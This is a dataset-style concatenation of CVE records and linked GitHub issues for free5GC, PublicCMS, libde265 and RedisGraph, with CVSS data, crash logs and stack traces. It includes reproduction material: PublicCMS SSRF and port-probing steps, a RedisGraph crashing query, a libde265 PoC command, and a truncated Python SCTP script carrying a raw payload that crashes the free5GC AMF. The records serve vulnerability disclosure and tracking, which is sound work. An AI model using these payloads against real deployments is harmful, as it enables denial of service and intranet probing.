## Expected behavior Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the total length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF. ## Screenshots No special screenshot is provided. ## Environment (please complete the following information): - free5GC Version: v3.3.0 - OS: Ubuntu 20.04 - Kernel version: 5.4.5-050405-generic - go version: go1.21.1 linux/amd64 ## Trace File ### Configuration File No specific configuration is required. ### PCAP File No specific pcap file is provided. ### Log File ```bash 2023-10-24T17:49:15.614745280+08:00 [INFO][UPF][CFG] ================================================== 2023-10-24T17:49:15.614761831+08:00 [INFO][UPF][Main] Log level is set to [info] 2023-10-24T17:49:15.614777264+08:00 [INFO][UPF][Main] Report Caller is set to [false] 2023-10-24T17:49:15.614837834+08:00 [INFO][UPF][Main] starting Gtpu Forwarder [gtp5g] 2023-10-24T17:49:15.614864772+08:00 [INFO][UPF][Main] GTP Address: "127.0.0.8:2152" 2023-10-24T17:49:15.650332227+08:00 [INFO][UPF][BUFF] buff netlink server started 2023-10-24T17:49:15.650439249+08:00 [INFO][UPF][Perio] perio server started 2023-10-24T17:49:15.650444691+08:00 [INFO][UPF][Gtp5g] Forwarder started 2023-10-24T17:49:15.652112097+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] starting pfcp server 2023-10-24T17:49:15.652132290+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] pfcp server started 2023-10-24T17:49:15.652138607+08:00 [INFO][UPF][Main] UPF started 2023-10-24T17:50:42.343823681+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] handleAssociationSetupRequest 2023-10-24T17:50:42.343962121+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805][CPNodeID:10.100.200.100] New node 2023-10-24T17:50:42.347048969+08:00 [FATA][UPF][PFCP][LAddr:127.0.0.8:8805] panic: runtime error: slice bounds out of range [6:4] goroutine 10 [running]: runtime/debug.Stack() /usr/local/go/src/runtime/debug/stack.go:24 +0x65 github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1() /home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x5d panic({0x860400, 0xc000490210}) /usr/local/go/src/runtime/panic.go:1038 +0x215 github.com/wmnsk/go-pfcp/ie.(*IE).UnmarshalBinary(0x10000c0000cbb30, {0xc000490200, 0x20, 0x30}) /home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:371 +0x1a5 github.com/wmnsk/go-pfcp/ie.Parse({0xc000490200, 0xb, 0xb}) /home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:339 +0x48 github.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc000490200, 0x13, 0x13}) /home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:632 +0x8c github.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc000096720, {0xc0004901f8, 0x0, 0xadaa82a41536e5d2}) /home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0x6e github.com/wmnsk/go-pfcp/message.Parse({0xc0004901f8, 0x13, 0x13}) /home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x3ab github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc000400a90, 0xc0004030d0) /home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x4ce created by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start /home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xd2 ```
[Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes
https://api.github.com/repos/free5gc/free5gc/issues/496/comments
1
2023-10-24T11:07:44Z
2023-11-26T13:36:56Z
https://github.com/free5gc/free5gc/issues/496
1,959,013,436
496
5,751
CVE-2023-48204
2023-11-16T00:15:06.770
An issue in PublicCMS v.4.0.202302.e allows a remote attacker to obtain sensitive information via the appToken and Parameters parameter of the api/method/getHtml component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/sanluan/PublicCMS/issues/77" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/sanluan/PublicCMS/issues/77" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0.202302.e:*:*:*:*:*:*:*", "matchCriteriaId": "696F37D9-7CB7-428B-ADE4-3EB40573111A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/sanluan/PublicCMS/issues/77
[ "Exploit", "Issue Tracking" ]
github.com
[ "sanluan", "PublicCMS" ]
1.After logging into the backend system,add an application authorization to obtain an appKey and appSecret ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/b0f6e0eb-7a4c-43ea-bd7e-6647bb60e708) 2.Obtain apptoken through the /api/appToken interface with appkey and appsecret ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/dd4c802d-5eb5-4d29-b6c0-eb5675dc9294) 3.The SSRF vulnerability exists in the "parameters" parameter of the /api/method/getHtml interface, which can be used to access the website of intranet,for example,access 127.0.0.1:8080/admin and return the page content. ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/6e52ecc7-de17-4f8c-a12e-8b3fed4ee8ac) 4.In addition, it can also be used to detect open ports on the intranet system. When the port is open, the response time is only a few milliseconds, but when the port is not open, the response time is about 2000 milliseconds.This obvious response time difference can be used to determine whether the port is open. ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/401154e8-7ae1-4d7d-8ae8-9a9d14849523) ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/19596c3e-c9ce-48c2-bc38-072f8bf4df2c) 5.The vulnerability entrance is in `MethodController.java`. It receives an "appToken" and "parameters" parameter, assigns the "parameters" parameters to the list, and then calls `method.execute(request, list)`, the "method" is the method specified by {name} ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/b3b5a8b0-e598-49da-ae99-c65ee288e2fb) 6.When {name} is "getHtml", enter the` execute(@SuppressWarnings("unused") HttpServletRequest request, List<TemplateModel> arguments) `method of `BaseMethod.java` ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/62f2785e-6838-4380-a421-f651776caac9) 7.Then enter the `execute(List<TemplateModel> arguments)` method of `GetHtmlMethod.java`, take the values from the incoming parameters and assign them to the "url" and "body", and then determine whether the "body" is empty. If not, send a post request to the "url". If it is empty, send a get request to the "url". ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/971f36fd-7a97-41f1-b329-464f99b14c25) 8.After sending the request, the returned content is directly returned to the client. During this period, no detection is made on whether the "paramaters" parameter is illegal, and there is no detection of ssrf-related interceptors, so ssrf can be directly performed and obtained through the server request. Any URL address can be used to access some sensitive resources on the intranet or detect the port of the intranet system. ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/83f83604-fd9f-4688-8d2b-30cb8f7dbf79) ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/672fa02c-787e-431d-81d6-d7e068039b1c)
There is an SSRF vulnerability in publiccms V4.0.202302.e, whice allow attackers to access the website of intranet or detect whether the port is open
https://api.github.com/repos/sanluan/PublicCMS/issues/77/comments
1
2023-11-12T07:38:06Z
2023-12-15T07:40:41Z
https://github.com/sanluan/PublicCMS/issues/77
1,989,279,808
77
5,752
CVE-2023-47471
2023-11-16T04:15:06.857
Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/strukturag/libde265/commit/e36b4a1b0bafa53df47514c419d5be3e8916ebc7" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/strukturag/libde265/issues/426" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/strukturag/libde265/commit/e36b4a1b0bafa53df47514c419d5be3e8916ebc7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/strukturag/libde265/issues/426" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "A736D1CB-9F33-4561-B10C-4074DF6C02F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/strukturag/libde265/issues/426
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "strukturag", "libde265" ]
# SEGV in libde265 ### Description Libde265 v1.0.12 was discovered to contain a SEGV via the function slice_segment_header::dump_slice_segment_header at slice.cc. ### Version ```shell libde265/dec265 v1.0.12 ``` ### ASAN Log ./dec265/dec265 -c -d -f 153 poc1libde265 ```shell AddressSanitizer:DEADLYSIGNAL ================================================================= ==38==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000551716 bp 0x7ffff7ad66a0 sp 0x7fffffff3de0 T0) ==38==The signal is caused by a READ memory access. ==38==Hint: address points to the zero page. #0 0x551716 in slice_segment_header::dump_slice_segment_header(decoder_context const*, int) const /afltest/libde265/libde265/slice.cc:1281:3 #1 0x4db1b1 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /afltest/libde265/libde265/decctx.cc:646:11 #2 0x4e5626 in decoder_context::decode_NAL(NAL_unit*) /afltest/libde265/libde265/decctx.cc:1241:11 #3 0x4e6247 in decoder_context::decode(int*) /afltest/libde265/libde265/decctx.cc:1329:16 #4 0x4cd5c4 in main /afltest/libde265/dec265/dec265.cc:784:17 #5 0x7ffff790d082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x41e66d in _start (/afltest/libde265/dec265/dec265+0x41e66d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /afltest/libde265/libde265/slice.cc:1281:3 in slice_segment_header::dump_slice_segment_header(decoder_context const*, int) const ==38==ABORTING ``` ### Reproduction ```shell ./autogen.sh export CFLAGS="-g -lpthread -fsanitize=address" export CXXFLAGS="-g -lpthread -fsanitize=address" CC=clang CXX=clang++ ./configure --disable-shared make -j 32 ./dec265/dec265 -c -d -f 153 poc1libde265 ``` ### PoC poc1libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1libde265 ### Reference https://github.com/strukturag/libde265 ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
SEGV in libde265 in slice_segment_header::dump_slice_segment_header
https://api.github.com/repos/strukturag/libde265/issues/426/comments
1
2023-11-03T17:48:11Z
2023-11-07T07:21:53Z
https://github.com/strukturag/libde265/issues/426
1,976,666,798
426
5,753
CVE-2023-47003
2023-11-16T05:15:29.927
An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RedisGraph/RedisGraph/issues/3063" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RedisGraph/RedisGraph/issues/3063" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redislabs:redisgraph:2.12.10:*:*:*:*:*:*:*", "matchCriteriaId": "18654D3D-CA97-42DC-8D99-092344B58052", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/RedisGraph/RedisGraph/issues/3063
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "RedisGraph", "RedisGraph" ]
When running the following query: ```cypher CREATE (x) CREATE ()-[:A{n1:size([n2 IN [n3 IN [0] | x.n4] | 0])}]->()-[y:B]->() DELETE y ``` The RedisGraph instance crashes due to a null-pointer dereference. I encountered this issue when testing queries against **RedisGraph v2.12.0** compiled with address sanitization in a Docker container running **alpine v.3**. <details> <summary>Redis Bug Report</summary> ``` === REDIS BUG REPORT START: Cut & paste starting from here === 10:M 24 Apr 2023 18:54:43.433 # Redis 7.0.11 crashed by signal: 11, si_code: 128 10:M 24 Apr 2023 18:54:43.433 # Accessing address: (nil) 10:M 24 Apr 2023 18:54:43.433 # Crashed running the instruction at: 0x7f283d48aef5 ------ STACK TRACE ------ EIP: /app/bin/linux-x64-debug-asan/src/redisgraph.so(DataBlock_ItemIsDeleted+0x25)[0x7f283d48aef5] Backtrace: redis-server *:6379(sigsegvHandler+0x8a)[0x56216429294a] /lib/x86_64-linux-gnu/libpthread.so.0(+0x13140)[0x7f28452a2140] /app/bin/linux-x64-debug-asan/src/redisgraph.so(DataBlock_ItemIsDeleted+0x25)[0x7f283d48aef5] /app/bin/linux-x64-debug-asan/src/redisgraph.so(Graph_EntityIsDeleted+0x40)[0x7f283d3a9000] /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x6a02ee)[0x7f283d3212ee] /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x69f5d0)[0x7f283d3205d0] /app/bin/linux-x64-debug-asan/src/redisgraph.so(OpBase_Free+0x7d)[0x7f283d307f5d] /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x671bd7)[0x7f283d2f2bd7] /app/bin/linux-x64-debug-asan/src/redisgraph.so(ExecutionPlan_Free+0x4d)[0x7f283d2f2a2d] /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x6407d4)[0x7f283d2c17d4] /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x831d8a)[0x7f283d4b2d8a] /lib/x86_64-linux-gnu/libpthread.so.0(+0x7ea7)[0x7f2845296ea7] /lib/x86_64-linux-gnu/libc.so.6(clone+0x3f)[0x7f28451b4a2f] ------ REGISTERS ------ 10:M 24 Apr 2023 18:54:43.436 # RAX:ffffffffffffffff RBX:00007f28371a44c0 RCX:1fffffffffffffff RDX:0000000000000000 RDI:0000000000000000 RSI:00007f28371a3520 RBP:00007f28371a3e40 RSP:00007f28371a3e20 R8 :0000000000000001 R9 :000000000000000a R10:000000000000001e R11:00007f28369a7000 R12:00007ffc3cf1c2ce R13:00007ffc3cf1c2cf R14:00007f28371a46c0 R15:0000000000802000 RIP:00007f283d48aef5 EFL:0000000000010a07 CSGSFS:002b000000000033 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2f) -> 00007f2831828178 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2e) -> 00007f2831828180 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2d) -> 00007f2831828180 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2c) -> 00007f2831828180 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2b) -> 00007f2831828180 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2a) -> 00007f2831828180 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e29) -> 00007f283d3212ee 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e28) -> 00007f28371a3fd0 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e27) -> 00007f2831834a0c 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e26) -> 00007f2831834a0c 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e25) -> 00007f283d3a9000 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e24) -> 00007f28371a3e60 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e23) -> 0000000000000000 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e22) -> ffffffffffffffff 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e21) -> 834cfcd8e8894900 10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e20) -> 00007f28371a3d70 ------ INFO OUTPUT ------ # Server redis_version:7.0.11 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:5c712dc4cb9cfb70 redis_mode:standalone os:Linux 6.2.10-arch1-1 x86_64 arch_bits:64 monotonic_clock:POSIX clock_gettime multiplexing_api:epoll atomicvar_api:c11-builtin gcc_version:10.2.1 process_id:10 process_supervised:no run_id:567d37ab65b9a1eff8459ee690db4f259efbed00 tcp_port:6379 server_time_usec:1682362483432067 uptime_in_seconds:7 uptime_in_days:0 hz:10 configured_hz:10 lru_clock:4640883 executable:/redis/redis-server config_file: io_threads_active:0 # Clients connected_clients:1 cluster_connections:0 maxclients:10000 client_recent_max_input_buffer:0 client_recent_max_output_buffer:0 blocked_clients:1 tracking_clients:0 clients_in_timeout_table:0 # Memory used_memory:1497320 used_memory_human:1.43M used_memory_rss:42692608 used_memory_rss_human:40.71M used_memory_peak:1497320 used_memory_peak_human:1.43M used_memory_peak_perc:110.76% used_memory_overhead:929048 used_memory_startup:928792 used_memory_dataset:568272 used_memory_dataset_perc:99.95% allocator_allocated:1223920 allocator_active:1409024 allocator_resident:4825088 total_system_memory:8039120896 total_system_memory_human:7.49G used_memory_lua:31744 used_memory_vm_eval:31744 used_memory_lua_human:31.00K used_memory_scripts_eval:0 number_of_cached_scripts:0 number_of_functions:0 number_of_libraries:0 used_memory_vm_functions:32768 used_memory_vm_total:64512 used_memory_vm_total_human:63.00K used_memory_functions:184 used_memory_scripts:184 used_memory_scripts_human:184B maxmemory:0 maxmemory_human:0B maxmemory_policy:noeviction allocator_frag_ratio:1.15 allocator_frag_bytes:185104 allocator_rss_ratio:3.42 allocator_rss_bytes:3416064 rss_overhead_ratio:8.85 rss_overhead_bytes:37867520 mem_fragmentation_ratio:45.96 mem_fragmentation_bytes:41763672 mem_not_counted_for_evict:0 mem_replication_backlog:0 mem_total_replication_buffers:0 mem_clients_slaves:0 mem_clients_normal:0 mem_cluster_links:0 mem_aof_buffer:0 mem_allocator:jemalloc-5.2.1 active_defrag_running:0 lazyfree_pending_objects:0 lazyfreed_objects:0 # Persistence loading:0 async_loading:0 current_cow_peak:0 current_cow_size:0 current_cow_size_age:0 current_fork_perc:0.00 current_save_keys_processed:0 current_save_keys_total:0 rdb_changes_since_last_save:0 rdb_bgsave_in_progress:0 rdb_last_save_time:1682362476 rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec:-1 rdb_current_bgsave_time_sec:-1 rdb_saves:0 rdb_last_cow_size:0 rdb_last_load_keys_expired:0 rdb_last_load_keys_loaded:0 aof_enabled:0 aof_rewrite_in_progress:0 aof_rewrite_scheduled:0 aof_last_rewrite_time_sec:-1 aof_current_rewrite_time_sec:-1 aof_last_bgrewrite_status:ok aof_rewrites:0 aof_rewrites_consecutive_failures:0 aof_last_write_status:ok aof_last_cow_size:0 module_fork_in_progress:0 module_fork_last_cow_size:0 # Stats total_connections_received:1 total_commands_processed:2 instantaneous_ops_per_sec:0 total_net_input_bytes:246 total_net_output_bytes:93 total_net_repl_input_bytes:0 total_net_repl_output_bytes:0 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 instantaneous_input_repl_kbps:0.00 instantaneous_output_repl_kbps:0.00 rejected_connections:0 sync_full:0 sync_partial_ok:0 sync_partial_err:0 expired_keys:0 expired_stale_perc:0.00 expired_time_cap_reached_count:0 expire_cycle_cpu_milliseconds:0 evicted_keys:0 evicted_clients:0 total_eviction_exceeded_time:0 current_eviction_exceeded_time:0 keyspace_hits:3 keyspace_misses:1 pubsub_channels:0 pubsub_patterns:0 pubsubshard_channels:0 latest_fork_usec:0 total_forks:0 migrate_cached_sockets:0 slave_expires_tracked_keys:0 active_defrag_hits:0 active_defrag_misses:0 active_defrag_key_hits:0 active_defrag_key_misses:0 total_active_defrag_time:0 current_active_defrag_time:0 tracking_total_keys:0 tracking_total_items:0 tracking_total_prefixes:0 unexpected_error_replies:0 total_error_replies:0 dump_payload_sanitizations:0 total_reads_processed:2 total_writes_processed:1 io_threaded_reads_processed:0 io_threaded_writes_processed:0 reply_buffer_shrinks:0 reply_buffer_expands:0 # Replication role:master connected_slaves:0 master_failover_state:no-failover master_replid:545e76b89a7a511fa91ced8a5dfd8c5b7429f8ee master_replid2:0000000000000000000000000000000000000000 master_repl_offset:0 second_repl_offset:-1 repl_backlog_active:0 repl_backlog_size:1048576 repl_backlog_first_byte_offset:0 repl_backlog_histlen:0 # CPU used_cpu_sys:0.015967 used_cpu_user:0.031885 used_cpu_sys_children:0.000000 used_cpu_user_children:0.000000 used_cpu_sys_main_thread:0.000000 used_cpu_user_main_thread:0.002797 # Modules module:name=graph,ver=21200,api=1,filters=0,usedby=[],using=[],options=[] # Commandstats cmdstat_graph.QUERY:calls=2,usec=1751,usec_per_call=875.50,rejected_calls=0,failed_calls=0 # Errorstats # Latencystats latency_percentiles_usec_graph.QUERY:p50=1630.207,p99=1630.207,p99.9=1630.207 # Cluster cluster_enabled:0 # Keyspace db0:keys=1,expires=0,avg_ttl=0 ------ CLIENT LIST OUTPUT ------ id=6 addr=172.17.0.1:49156 laddr=172.17.0.2:6379 fd=8 name= age=0 idle=0 flags=b db=0 sub=0 psub=0 ssub=0 multi=-1 qbuf=0 qbuf-free=20474 argv-mem=140 multi-mem=0 rbs=16384 rbp=16384 obl=0 oll=0 omem=0 tot-mem=37804 events=r cmd=graph.QUERY user=default redir=-1 resp=2 ------ MODULES INFO OUTPUT ------ # graph_executing commands graph_command:GRAPH.QUERY CYPHER TIMEOUT_DEFAULT="30000" CREATE (x) CREATE ()-[:A{n1:size([n2 IN [n3 IN [0] | x.n4] | 0])}]->()-[y:B]->() DELETE y ------ CONFIG DEBUG OUTPUT ------ io-threads-do-reads no repl-diskless-sync yes lazyfree-lazy-expire no lazyfree-lazy-user-del no client-query-buffer-limit 1gb activedefrag no proto-max-bulk-len 512mb lazyfree-lazy-eviction no io-threads 1 sanitize-dump-payload no lazyfree-lazy-server-del no repl-diskless-load disabled replica-read-only yes slave-read-only yes list-compress-depth 0 lazyfree-lazy-user-flush no ------ FAST MEMORY TEST ------ 10:M 24 Apr 2023 18:54:43.437 # main thread terminated 10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #0 terminated 10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #1 terminated 10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #2 terminated Fast memory test PASSED, however your memory can still be broken. Please run a memory test for several hours if possible. ------ DUMPING CODE AROUND EIP ------ Symbol: DataBlock_ItemIsDeleted (base: 0x7f283d48aed0) Module: /app/bin/linux-x64-debug-asan/src/redisgraph.so (base 0x7f283cc81000) $ xxd -r -p /tmp/dump.hex /tmp/dump.bin $ objdump --adjust-vma=0x7f283d48aed0 -D -b binary -m i386:x86-64 /tmp/dump.bin ------ 10:M 24 Apr 2023 18:54:43.437 # dump of function (hexdump of 165 bytes): 554889e54883ec2048897df8488b45f84805ffffffff488945f0488b45f04889c148c1e9038a910080ff7f80fa00488945e88855e70f8423000000488b45e84825070000008a4de738c80f8c09000000488b7de8e87794d5ffe900000000488b45e88a0880e1010fb6d183e20183fa000f95c180e1010fb6d189d04883c4205dc3662e0f1f8400000000000f1f440000554889e54883ec3048897df8488975f0488b7df848 === REDIS BUG REPORT END. Make sure to include from START to END. === ``` </details> ### Steps to reproduce Run the following query and observe the database crashes: ```cypher CREATE (x) CREATE ()-[:A{n1:size([n2 IN [n3 IN [0] | x.n4] | 0])}]->()-[y:B]->() DELETE y ``` ### Expected behavior The query should run successfully. ### Actual behavior The database crashes due to a segfault.
Query crashes in `DataBlock_ItemIsDeleted`
https://api.github.com/repos/RedisGraph/RedisGraph/issues/3063/comments
0
2023-04-24T19:16:03Z
2023-04-24T19:16:03Z
https://github.com/RedisGraph/RedisGraph/issues/3063
1,681,876,852
3,063
5,754
CVE-2023-47025
2023-11-16T23:15:08.123
An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/501" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/free5gc/free5gc/issues/501
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
## Describe the bug When I try to send a captured UE registration request message to the AMF, the log shows 'sctp accept from <nil>,' and the AMF crashes, causing disconnection for other UEs as well. ## To Reproduce Steps to reproduce the behavior: 1. Using free5gc-compose to establish the AMF. 2. run free5gc with default config. 3. Run the following POC python script `import sys, sctp, socket if len(sys.argv) != 2: print("Usage: free5gc.py server-address") exit(0) sk = sctp.sctpsocket_tcp(socket.AF_INET) sk.connect((sys.argv[1], 38412)) ue_request=b'\x00\x0f\x40\x48\x00\x00\x05\x00\x55\x00\x02\x00\x01\x00\x26\x00\x1a\x19\x7e\x00\x41\x79\x00\x0d\x01\x02\xf8\x39\x00\x00\x00\x00\x00\x00\x00\x00\x30\x2e\x04\xf0\xf0\xf0\xf0\x00\x79\x00\x13\x50\x02\xf8\x39\x00\x00\x00\x01\x00\x02\xf8\x39\x00\x00\x01\xe8\xe8\x7e\xd4\x00\x5a\x40\x01\x18\x00\x70\x40\x01\x00' sk.sctp_send(ue_request, 